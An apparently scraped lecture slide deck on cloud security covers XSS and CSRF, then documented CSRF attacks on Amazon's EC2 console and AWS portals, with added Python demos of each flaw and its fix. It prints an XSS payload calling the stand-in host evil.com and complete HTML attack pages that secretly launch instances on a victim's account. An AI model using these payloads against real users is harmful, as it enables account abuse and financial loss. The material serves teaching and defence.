Cloud Insecurity
Marco Arena
Outline
• Recalls (XSS and CSRF)
• Attacks against Amazon EC2 management
  console
• Amazon EC2 real vulnerabilities
  – Web management console
  – Amazon Web Services (AWS) portals
• Conclusions
Recalls
• An XSS (Cross-Site Scripting) vulnerability
  allows an attacker to use a trusted website to
  deliver an attack: the website becomes the
  vector through which the attacker's script
  reaches the victims' browsers.

• XSS is, at the time of writing, the most widely
  reported class of software vulnerability.
• XSS, a simple example (server-side JSP):

  <c:if test="${param.sayHello}">
     Hello ${param.name}!
  </c:if>

  ${param.name} is reflected into the page without
  any output encoding.

  Evil parameter (URL-encoded value of name):

     %3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E

  Result:

  Hello <script src="http://evil.com/evil.js"></script>!
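The same reflection worked through in Python, as an added example that is not code from the slides: a stand-in for the JSP fragment above that decodes the slide's payload, reproduces the vulnerable output and shows the output-encoding fix. Everything except the payload and the evil.com placeholder (the query strings, function names and the boolean check that mimics JSTL's coercion) is this example's own construction.

```python
"""Reflected XSS: the slide's JSP greeting emulated in Python.

Added example (not code from the original slides): a stand-in for

    <c:if test="${param.sayHello}">Hello ${param.name}!</c:if>

that decodes the slide's percent-encoded payload, shows why the raw
template is vulnerable, and shows the output-encoding fix. The hosts
evil.com / evil.js are the slide's placeholders; the query strings and
helper names are constructed for this example.
"""
from html import escape
from urllib.parse import parse_qs, unquote

# Payload from the slide, percent-encoded as it travels in the query string.
EVIL_PARAM = "%3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E"


def decode_payload(encoded: str) -> str:
    """What the servlet container hands to ${param.name}: the URL-decoded value."""
    return unquote(encoded)


def _params(query_string: str) -> dict:
    """First value of each query parameter, URL-decoded (parse_qs does the decoding)."""
    return {k: v[0] for k, v in parse_qs(query_string, keep_blank_values=True).items()}


def render_hello_vulnerable(query_string: str) -> str:
    """Mirror of the JSP: ${param.name} is written into the HTML verbatim.

    JSTL's <c:if test="${param.sayHello}"> coerces the parameter with
    Boolean.valueOf, which is true only for the string "true" (any case);
    that check is reproduced here.
    """
    p = _params(query_string)
    if p.get("sayHello", "").lower() != "true":
        return ""
    return f"Hello {p.get('name', '')}!"


def render_hello_fixed(query_string: str) -> str:
    """Same page with output encoding: untrusted text is HTML-entity-escaped
    before it enters the document (in JSTL: <c:out value="${param.name}"/>,
    which escapes by default)."""
    p = _params(query_string)
    if p.get("sayHello", "").lower() != "true":
        return ""
    return f"Hello {escape(p.get('name', ''), quote=True)}!"


def contains_live_script(html_fragment: str) -> bool:
    """Crude oracle for the demo: did a <script> start tag survive into the output?"""
    return "<script" in html_fragment.lower()


if __name__ == "__main__":
    query = "sayHello=true&name=" + EVIL_PARAM   # constructed request, as on the slide
    print("decoded payload :", decode_payload(EVIL_PARAM))
    print("vulnerable page :", render_hello_vulnerable(query))
    print("fixed page      :", render_hello_fixed(query))
```

The fix does not try to recognise or filter `<script>`; it encodes every character that has meaning to the HTML parser, which is the only transformation the `Hello ${param.name}!` text context needs. A different context (an attribute value, a URL, inline JavaScript) would need its own encoding.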
• CSRF (Cross-Site Request Forgery) is an
  attack which forces an end user to
  execute unwanted actions on a web
  application in which he/she is currently
  authenticated.

• CSRF tricks the victim into loading a page
  that contains a malicious request.
• CSRF, a simple example:

  The user has an active session on a trusted
  blog (e.g. MySpace). While still logged in, the
  user visits an evil site whose page contains:

     ...
     <img src="http://trustedblog.com/addfriend.php?id=12345"/>
     ...

  The browser fetches the image URL and, because
  the request goes to trustedblog.com, attaches
  the user's session cookie: the blog adds friend
  12345 to the victim's account without the
  victim noticing.
Attacks against EC2
• The Amazon EC2 cloud is managed via web
  services and web interface consoles.

• The web management console asks the user to
  provide her Amazon.com username and
  password.

• The login page is hosted on the Amazon.com
  domain, so the console is exposed to any web
  application vulnerability found anywhere on
  that domain, not only in the console itself.
• Once an attacker gains access to the EC2
  user’s session, the Amazon web
  management console offers a wealth of
  information related to the victim’s EC2
  instances (X.509 certificates, secret
  tokens, ...).
• If the attacker discovers an XSS
  vulnerability anywhere on the
  Amazon.com domain, he can use a simple
  JavaScript payload to steal the EC2 user’s
  Access Key ID and Secret Access Key.
Amazon EC2 real vulnerabilities
• The security of a user's AMI instances
  depends on the security of the web
  management console used to administer them.

• Several portions of Amazon's web
  management console were vulnerable to
  cross-site request forgery (CSRF) attacks;
  the cases that follow are those documented
  in Hacking: The Next Generation (see
  References).
Web management console vulnerabilities

• The first vulnerability allows the attacker to
  start an arbitrary AMI instance under the
  victim's EC2 account (and at the victim's
  expense).

• Two parts:
  – Initialize the launch wizard with an evil AMI;
  – Launch the instance under the victim's EC2
    account.
initialize.html (cross-domain image tag):

<html>
<body>
<!-- The browser fetches this URL with the victim's console cookies attached,
     so the launch wizard is pre-populated with the attacker's AMI. -->
<img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
</body>
</html>
launch.html:

<html>
<body>
<!-- Hidden form posted to the console with the victim's cookies attached.
     MaxCount is set absurdly high so that as many instances as the account
     permits are started. -->
<form action="https://console.aws.amazon.com/ec2/runInstancesJson?"
      id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
<input type="hidden" name="action.MinCount" value="1" />
<input type="hidden" name="action.InstanceType" value="m1.small" />
<input type="hidden" name="action.SecurityGroup" value="default" />
<input type="hidden" name="action.SecurityGroup" value="Webserver" />
<input type="hidden" name="action.MaxCount" value="1000000" />
<input type="hidden" name="action.ImageId" value="ami-00031337" />
<input type="hidden" name="mbtc" value="50084" />
<input type="hidden" name="region" value="us-east-1" />
</form>
<script>
// Wait five seconds so the wizard request from initialize.html completes first.
setTimeout("document.LaunchEvilAMI.submit()", 5000);
</script>
</body>
</html>
Merge (the victim only has to open this page; the
frames are zero-sized, so the browser never displays
the web server's replies):

<html>
<body>
<iframe src="./initialize.html" height="0" width="0"></iframe>
<iframe src="./launch.html" height="0" width="0"></iframe>
</body>
</html>
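Both CSRF examples above, the addfriend.php image tag from the recap and the initialize.html / launch.html pair, exploit the same server-side omission: the endpoint treats a request as the user's because the browser attached the user's cookie. The Python below is an added example (not code from the slides, and not Amazon's) that emulates such an endpoint twice, once with cookie-only authentication and once with the defences that block both the cross-domain <img> GET and the auto-submitted cross-site POST. The Request and Session types, the session cookie name, the csrf_token parameter, CONSOLE_ORIGIN, the attacker origin https://evil.example and the placeholder image ami-12345678 are assumptions of the example; the action.* parameter names and ami-00031337 follow the slides.

```python
"""CSRF against a state-changing console action, emulated in Python.

Added example, not code from the original slides and not Amazon's code.
A toy server keeps one logged-in session per cookie and exposes a
runInstances action. The vulnerable handler does what the slides'
initialize.html / launch.html rely on: the session cookie is the only
check and GET and POST are treated alike, so both the cross-domain
<img> GET and the auto-submitted cross-site POST succeed. The fixed
handler adds the standard defences: state changes only on POST, an
Origin check, and a per-session synchronizer token that a page on
another origin cannot read. Request/Session, the cookie name "session",
csrf_token, CONSOLE_ORIGIN, https://evil.example and ami-12345678 are
this example's assumptions.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

CONSOLE_ORIGIN = "https://console.aws.amazon.com"


@dataclass
class Request:
    method: str
    params: Dict[str, str]          # query string or form body, already decoded
    cookies: Dict[str, str]         # attached by the browser, cross-site or not
    origin: Optional[str] = None    # browsers add Origin to cross-site POSTs, not to <img> GETs


@dataclass
class Session:
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))
    launched: List[Tuple[str, int]] = field(default_factory=list)


SESSIONS: Dict[str, Session] = {}   # session cookie value -> Session


def login(user: str) -> str:
    """Authenticate a user and return the session cookie the browser will store."""
    cookie = secrets.token_urlsafe(16)
    SESSIONS[cookie] = Session(user)
    return cookie


def _launch(sess: Session, req: Request) -> Tuple[int, str]:
    """The actual state change: record (image, count) against the session."""
    image = req.params.get("action.ImageId", "")
    count = int(req.params.get("action.MaxCount", "1"))
    sess.launched.append((image, count))
    return 200, f"launched {count} x {image} for {sess.user}"


def run_instances_vulnerable(req: Request) -> Tuple[int, str]:
    """Cookie is the only check: exactly the pattern the slides exploit."""
    sess = SESSIONS.get(req.cookies.get("session", ""))
    if sess is None:
        return 401, "not logged in"
    return _launch(sess, req)


def run_instances_fixed(req: Request) -> Tuple[int, str]:
    """Same action with CSRF defences layered in front of it."""
    sess = SESSIONS.get(req.cookies.get("session", ""))
    if sess is None:
        return 401, "not logged in"
    if req.method != "POST":                          # no state change on GET: kills the <img> vector
        return 405, "state change requires POST"
    if req.origin is not None and req.origin != CONSOLE_ORIGIN:
        return 403, "cross-origin request rejected"   # kills the cross-site form post outright
    token = req.params.get("csrf_token", "")          # must be copied from the console's own page
    if not hmac.compare_digest(token, sess.csrf_token):
        return 403, "missing or invalid CSRF token"
    return _launch(sess, req)


# What the victim's browser actually sends after loading the attacker's page (constructed).
def forged_image_get(cookie: str) -> Request:
    """The initialize.html <img> tag: a cross-domain GET carrying the victim's cookie."""
    return Request("GET", {"action.ImageId": "ami-00031337", "groupName": "Webserver"},
                   {"session": cookie})


def forged_form_post(cookie: str) -> Request:
    """The launch.html form auto-submitted by setTimeout: cross-site POST, cookie attached."""
    return Request("POST", {"action.ImageId": "ami-00031337", "action.InstanceType": "m1.small",
                            "action.MaxCount": "1000000"},
                   {"session": cookie}, origin="https://evil.example")


def legitimate_post(cookie: str, image: str) -> Request:
    """A real click in the console: same origin, token read from the console's own HTML."""
    return Request("POST", {"action.ImageId": image, "action.MaxCount": "1",
                            "csrf_token": SESSIONS[cookie].csrf_token},
                   {"session": cookie}, origin=CONSOLE_ORIGIN)


if __name__ == "__main__":
    victim = login("victim")
    for handler in (run_instances_vulnerable, run_instances_fixed):
        print(handler.__name__)
        print("  img GET   ->", handler(forged_image_get(victim)))
        print("  form POST ->", handler(forged_form_post(victim)))
        print("  real POST ->", handler(legitimate_post(victim, "ami-12345678")))  # placeholder AMI
```

Note the order of checks in run_instances_fixed: refusing GET removes the image-tag vector entirely, the Origin comparison stops cross-site form posts from any browser that sends the header, and the synchronizer token covers the rest, since a page on evil.example cannot read the console's HTML to copy it. A SameSite=Lax or Strict attribute on the session cookie would add a fourth, browser-enforced layer.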
• The second vulnerability terminates arbitrary
  instances being run by the victim.

• After the attack is launched, all the victim
  can see is that the instance was terminated
  without her consent.
• The last vulnerability involves the deletion
  of EC2 key pairs.

• Using a CSRF vulnerability, an attacker can
  delete arbitrary key pairs from a victim's EC2
  account. EC2 stores only the public half of a
  key pair and there is no undo, so the deleted
  key pair has to be re-created and redistributed;
  a user who has not kept a backup of the private
  key cannot recover it from Amazon and loses
  access to the instances launched with that key
  pair.
AWS portals vulnerabilities

• AWS was the first method Amazon provided to
  manage AMIs and is generally considered the
  most secure option for AMI administration.

• The three most common methods of
  authentication are:
  – a username/password combination;
  – an Access Key ID/Secret Access Key combination;
  – X.509 certificates.
• The first attack against the AWS portal
  generates a new access key for the EC2 user's
  account.

• Access keys authenticate a user to AWS, which
  is used to administer and manage the various
  AMIs running in the user's account.

• The attacker can thus cause a temporary denial
  of service: every application that authenticates
  with the old access key stops working until the
  administrator updates it to use the newly
  generated key.
• The second attack forcibly deletes the X.509
  certificates previously generated by the EC2
  user.

• Once the X.509 certificates are deleted, every
  application that relied on X.509 certificate
  authentication stops working and must be
  redeployed with newly generated certificates.
Conclusions

• Cloud computing allows organizations to focus
  on their core business while keeping their IT
  infrastructure flexible enough to meet the
  demands of current and future users.

• But it does not magically protect application
  logic from abuse or prevent attacks at the
  application level.

• Uploading the most hardened virtual machine
  will not prevent attacks against the web-based
  management consoles used to administer those
  virtual machines: the console is part of the
  attack surface.

• Cloud providers must fix their security bugs
  and keep their code under continuous review.
References

• Nitesh Dhanjani, Billy Rios, Brett Hardin. Hacking: The Next Generation. O'Reilly, 2009.

• Rich Cannings, Himanshu Dwivedi, Zane Lackey. Hacking Exposed: Web 2.0. McGraw-Hill, 2008.

• Brian Chess, Jacob West. Secure Programming with Static Analysis. Addison-Wesley, 2007.

Mais conteúdo relacionado

Mais procurados

Security Function
Security FunctionSecurity Function
Security FunctionSamuel Soon
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance PreparationEbizon
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsAri Apridana
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupAngela Bowman
 

Mais procurados (6)

Amazon cloudtutorial
Amazon cloudtutorialAmazon cloudtutorial
Amazon cloudtutorial
 
Security Function
Security FunctionSecurity Function
Security Function
 
AWS Instance Preparation
AWS Instance PreparationAWS Instance Preparation
AWS Instance Preparation
 
Cloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its ThreatsCloud Vulnerabilities and Its Threats
Cloud Vulnerabilities and Its Threats
 
Xss frame work
Xss frame workXss frame work
Xss frame work
 
Security Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress MeetupSecurity Presentation for Boulder WordPress Meetup
Security Presentation for Boulder WordPress Meetup
 

Destaque

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10LJepson
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and whiteDosage
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室Fujtia Naoya
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giantparamlowe
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion linealMAREST10
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983Dosage
 

Destaque (7)

Mos presentation 6 10
Mos presentation 6 10Mos presentation 6 10
Mos presentation 6 10
 
4 as speech 1993 newman and white
4 as speech 1993 newman and white4 as speech 1993 newman and white
4 as speech 1993 newman and white
 
【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室【本課題】04番 ハロー会議室
【本課題】04番 ハロー会議室
 
The Dawn Of New Web Giant
The Dawn Of New Web GiantThe Dawn Of New Web Giant
The Dawn Of New Web Giant
 
Expansion termica Expansion lineal
Expansion termica   Expansion linealExpansion termica   Expansion lineal
Expansion termica Expansion lineal
 
Ad age planning imported 1983
Ad age planning imported 1983Ad age planning imported 1983
Ad age planning imported 1983
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 

Semelhante a Cloud Insecurity

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Amazon Web Services
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale Amazon Web Services
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesAmazon Web Services
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtHelen Rogers
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon Web Services
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overviewAjay Bidari
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!政雄 金森
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at ScaleAmazon Web Services
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWSAmazon Web Services
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessAmazon Web Services
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAmazon Web Services
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAmazon Web Services
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...Amazon Web Services Korea
 

Semelhante a Cloud Insecurity (20)

Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
Securing Media Content and Applications in the Cloud (MED401) | AWS re:Invent...
 
Best Practices for Security at Scale
Best Practices for Security at Scale Best Practices for Security at Scale
Best Practices for Security at Scale
 
Getting Started with Amazon EC2
Getting Started with Amazon EC2Getting Started with Amazon EC2
Getting Started with Amazon EC2
 
Amazon s3ec2
Amazon s3ec2Amazon s3ec2
Amazon s3ec2
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Architecting for the Cloud: Best Practices
Architecting for the Cloud: Best PracticesArchitecting for the Cloud: Best Practices
Architecting for the Cloud: Best Practices
 
Aws interview questions
Aws interview questionsAws interview questions
Aws interview questions
 
Security Best Practices_John Hildebrandt
Security Best Practices_John HildebrandtSecurity Best Practices_John Hildebrandt
Security Best Practices_John Hildebrandt
 
Amazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep DiveAmazon ECS Container Service Deep Dive
Amazon ECS Container Service Deep Dive
 
Cloud Security (AWS)
Cloud Security (AWS)Cloud Security (AWS)
Cloud Security (AWS)
 
Aws big picture_overview
Aws big picture_overviewAws big picture_overview
Aws big picture_overview
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!AWS FIS の実験テンプレートを書いてみよう!!
AWS FIS の実験テンプレートを書いてみよう!!
 
Best Practices for Security at Scale
Best Practices for Security at ScaleBest Practices for Security at Scale
Best Practices for Security at Scale
 
Running your First Application on AWS
Running your First Application on AWSRunning your First Application on AWS
Running your First Application on AWS
 
Primeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverlessPrimeros pasos con arquitecturas serverless
Primeros pasos con arquitecturas serverless
 
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh VariaAWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
AWS Architecting Cloud Apps - Best Practices and Design Patterns By Jinesh Varia
 
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 MasterclassAWS March 2016 Webinar Series - Amazon EC2 Masterclass
AWS March 2016 Webinar Series - Amazon EC2 Masterclass
 
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
[Games on AWS 2019] AWS 입문자를 위한 초단기 레벨업 트랙 | AWS 레벨업 하기! : 컨테이너 - 김세호 AWS 솔루션...
 

Último

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Último (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
